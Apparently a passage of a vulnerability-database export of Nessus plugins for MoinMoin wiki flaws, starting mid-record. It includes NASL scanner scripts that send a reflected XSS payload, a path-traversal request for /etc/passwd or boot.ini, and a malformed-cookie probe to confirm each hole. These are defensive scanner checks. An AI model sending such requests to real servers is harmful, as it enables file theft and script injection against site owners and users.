1)\n {\n report +=\n '\\nThis file was uploaded using the following request :' +\n '\\n' +\n '\\n' + snip +\n '\\n' + data_protection::sanitize_uid(output:exp_request) +\n '\\n' + snip +\n '\\n';\n }\n }\n security_warning(port:port, extra:report);\n}\nelse security_warning(port);\n", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T12:09:09", "description": "The version of MoinMoin running on the remote host is affected by a\ncross-site scripting vulnerability in the 'template' parameter of the\n'PageEditor.py' script. An unauthenticated, remote attacker,\nexploiting this flaw, could execute arbitrary script code in a user's\nbrowser.", "edition": 25, "published": "2010-06-07T00:00:00", "title": "MoinMoin PageEditor.py template Parameter XSS", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-2487"], "modified": "2010-06-07T00:00:00", "cpe": ["cpe:/a:moinmo:moinmoin"], "id": "MOINMOIN_PAGEEDITOR_XSS.NASL", "href": "https://www.tenable.com/plugins/nessus/46817", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(46817);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2010-2487\");\n script_bugtraq_id(40549);\n script_xref(name:\"Secunia\", value:\"40043\");\n\n script_name(english:\"MoinMoin PageEditor.py template Parameter XSS\");\n script_summary(english:\"Attempts a non-persistent XSS attack\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A wiki application on the remote web server has a cross-site scripting\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of MoinMoin running on the remote host is affected by a\ncross-site scripting vulnerability in the 'template' parameter of the\n'PageEditor.py' script. An unauthenticated, remote attacker,\nexploiting this flaw, could execute arbitrary script code in a user's\nbrowser.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://moinmo.in/MoinMoinBugs/1.9.2UnescapedInputForThemeAddMsg\");\n script_set_attribute(attribute:\"solution\", value:\"Apply the patch from the vendor's advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/06/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/06/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/06/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:moinmo:moinmoin\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses : XSS\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n\n script_dependencies(\"moinmoin_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/moinmoin\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"url_func.inc\");\n\nport = get_http_port(default:80);\ninstall = get_install_from_kb(appname:'moinmoin', port:port, exit_on_fail:TRUE);\n\npayload = SCRIPT_NAME + unixtime();\nexploit = '<script>alert(\\'' + payload + '\\')</script>';\n\nexploited = test_cgi_xss(\n port:port,\n dirs:make_list(install['dir']),\n cgi:'/'+payload,\n qs:'action=edit&template='+urlencode(str:exploit),\n pass_str:'<div class=\"warning\">[Template '+exploit + ' not found]',\n ctrl_re:'<li>Edit \"' + payload + '\"</li>'\n);\n\nif (!exploited)\n{\n install_url = build_url(qs:install['dir'] + '/', port:port);\n exit(0, \"The MoinMoin install at \" + install_url + \" is not affected.\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-01-20T12:09:08", "description": "The version of MoinMoin running on the remote host has an information\ndisclosure vulnerability. Using a specially crafted request, an\nunauthenticated, remote attacker can specify the directory that the\napplication uses for its static pages and read arbitrary files from\nthat directory, subject to the privileges under which the application\nruns.\n\nNote that successful exploitation requires MoinMoin's 'FCGI_FORCE_CGI'\nsetting to be enabled.", "edition": 24, "published": "2010-02-02T00:00:00", "title": "MoinMoin 'sys.argv' Information Disclosure", "type": "nessus", "bulletinFamily": "scanner", "cvelist": [], "modified": "2010-02-02T00:00:00", "cpe": ["cpe:/a:moinmo:moinmoin"], "id": "MOINMOIN_ARGV_INFO_DISCLOSURE.NASL", "href": "https://www.tenable.com/plugins/nessus/44383", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\n\nif (description)\n{\n script_id(44383);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_bugtraq_id(37853);\n script_xref(name:\"Secunia\", value:\"38242\");\n\n script_name(english:\"MoinMoin 'sys.argv' Information Disclosure\");\n script_summary(english:\"Tries to retrieve a local file\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"A wiki application on the remote web server has an information\ndisclosure vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of MoinMoin running on the remote host has an information\ndisclosure vulnerability. Using a specially crafted request, an\nunauthenticated, remote attacker can specify the directory that the\napplication uses for its static pages and read arbitrary files from\nthat directory, subject to the privileges under which the application\nruns.\n\nNote that successful exploitation requires MoinMoin's 'FCGI_FORCE_CGI'\nsetting to be enabled.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://moinmo.in/MoinMoinChat/Logs/moin-dev/2010-01-18\");\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://hg.moinmo.in/moin/1.9/rev/9d8e7ce3c3a2\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://moinmo.in/SecurityFixes\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to MoinMoin 1.9.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/01/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:moinmo:moinmoin\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n\n script_dependencies(\"moinmoin_detect.nasl\", \"os_fingerprint.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/moinmoin\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\n\nport = get_http_port(default:80);\ninstall = get_install_from_kb(appname:'moinmoin', port:port);\nif (isnull(install))\n exit(1, \"No MoinMoin installs on port \"+port+\" were found in the KB.\");\n\nurl = install['dir']+'/';\nres = http_send_recv3(method:\"GET\", item:url, port:port);\nif (isnull(res)) exit(1, \"The web server on port \"+port+\" failed to respond.\");\n\n# First figure out the name of the static page directory\npattern = '<script type=\"text/javascript\" src=\"(/[^/]+)/common/js/common.js\">';\nmatch = eregmatch(string:res[2], pattern:pattern);\nif (match)\n static_dir = match[1];\nelse\n exit(1, \"Unable to extract static page dir from \"+build_url(qs:url, port:port)+\".\");\n\nos = get_kb_item(\"Host/OS\");\nif (!os || 'Windows' >< os)\n{\n # we'll do a dir traversal instead of providing an absolute path, which would\n # require specifying a drive letter\n dir['win'] = '../../../../../../../../../../../../../../../';\n file['win'] = 'boot.ini';\n pat['win'] = '\\\\[boot loader\\\\]';\n}\nif (!os || 'Windows' >!< os)\n{\n dir['unix'] = '/etc';\n file['unix'] = 'passwd';\n pat['unix'] = 'root:.*:0:[01]:';\n}\n\n# Then try to get a file outside the web root\nforeach os (keys(dir))\n{\n url = install['dir']+static_dir+'/'+file[os]+'?--htdocs+'+dir[os];\n res = http_send_recv3(method:\"GET\", item:url, port:port);\n if (isnull(res)) exit(1, \"The web server on port \"+port+\" failed to respond.\");\n\n if (!isnull(res[2]) && egrep(pattern:pat[os], string:res[2]))\n {\n if (report_verbosity > 0)\n {\n trailer = NULL;\n\n if (report_verbosity > 1)\n {\n trailer =\n crap(data:\"-\", length:30)+\" snip \"+crap(data:\"-\", length:30)+'\\n'+\n res[2]+'\\n'+\n crap(data:\"-\", length:30)+\" snip \"+crap(data:\"-\", length:30)+'\\n';\n }\n\n report = get_vuln_report(items:url, port:port, trailer:trailer);\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n\n exit(0);\n }\n}\n\nfull_url = build_url(qs:install['dir'] + '/', port:port);\nexit(0, 'The MoinMoin install at '+full_url+' is not affected.');\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-20T12:09:09", "description": "The remote host is running MoinMoin, a wiki application written in\nPython.\n\nThe version of MoinMoin installed on the remote host fails to validate\ninput to the 'MOIN_ID' cookie before using it to read and write user\nprofiles. By providing the name of a file that exists on the remote\nhost and is writable by the web server user id, an unauthenticated\nremote attacker may be able to exploit this issue to corrupt files,\npossibly even injecting arbitrary PHP code that could later be\nexecuted subject to the privileges of the web server user id.", "edition": 25, "published": "2008-01-24T00:00:00", "title": "MoinMoin MOIN_ID Cookie userform Action Traversal Arbitrary File Overwrite", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0782"], "modified": "2008-01-24T00:00:00", "cpe": ["cpe:/a:moinmo:moinmoin"], "id": "MOINMOIN_COOKIE_ID.NASL", "href": "https://www.tenable.com/plugins/nessus/30055", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(30055);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2008-0782\");\n script_bugtraq_id(27404);\n script_xref(name:\"EDB-ID\", value:\"4957\");\n script_xref(name:\"Secunia\", value:\"29010\");\n\n script_name(english:\"MoinMoin MOIN_ID Cookie userform Action Traversal Arbitrary File Overwrite\");\n script_summary(english:\"Tries to generate an error using an invalid cookie\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a Python application that suffers from\nan input sanitation vulnerability.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running MoinMoin, a wiki application written in\nPython.\n\nThe version of MoinMoin installed on the remote host fails to validate\ninput to the 'MOIN_ID' cookie before using it to read and write user\nprofiles. By providing the name of a file that exists on the remote\nhost and is writable by the web server user id, an unauthenticated\nremote attacker may be able to exploit this issue to corrupt files,\npossibly even injecting arbitrary PHP code that could later be\nexecuted subject to the privileges of the web server user id.\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://hg.moinmo.in/moin/1.5/rev/e69a16b6e630\");\n script_set_attribute(attribute:\"solution\", value:\"Apply the patches referenced in the project's advisory above.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(22);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/01/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:moinmo:moinmoin\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2008-2021 Tenable Network Security, Inc.\");\n\n script_dependencies(\"http_version.nasl\", \"moinmoin_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/moinmoin\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\n\nport = get_http_port(default:80);\ninstall = get_install_from_kb(appname:'moinmoin', port:port);\nif (isnull(install))\n exit(1, \"No MoinMoin installs on port \"+port+\" were found in the KB.\");\n\n# Pass in an invalid cookie.\nset_http_cookie(name: \"MOIN_ID\", value: \".\");\n\nurl = install['dir']+'/';\nr = http_send_recv3(method:\"GET\", item:url, port:port);\nif (isnull(r)) exit(1, \"The web server on port \"+port+\" failed to respond.\");\n\n# There's a problem if there's an error related to the cookie.\nif (\n '>IOError<' >< r[2] && '>[Errno 21]' >< r[2] &&\n \"auth_method='moin_cookie'\" >< r[2] && '/MoinMoin/user.py' >< r[2]\n)\n{\n security_hole(port);\n exit(0);\n}\nelse\n{\n full_url = build_url(qs:install['dir'] + '/', port:port);\n exit(0, 'The MoinMoin install at '+full_url+' is not affected.');\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}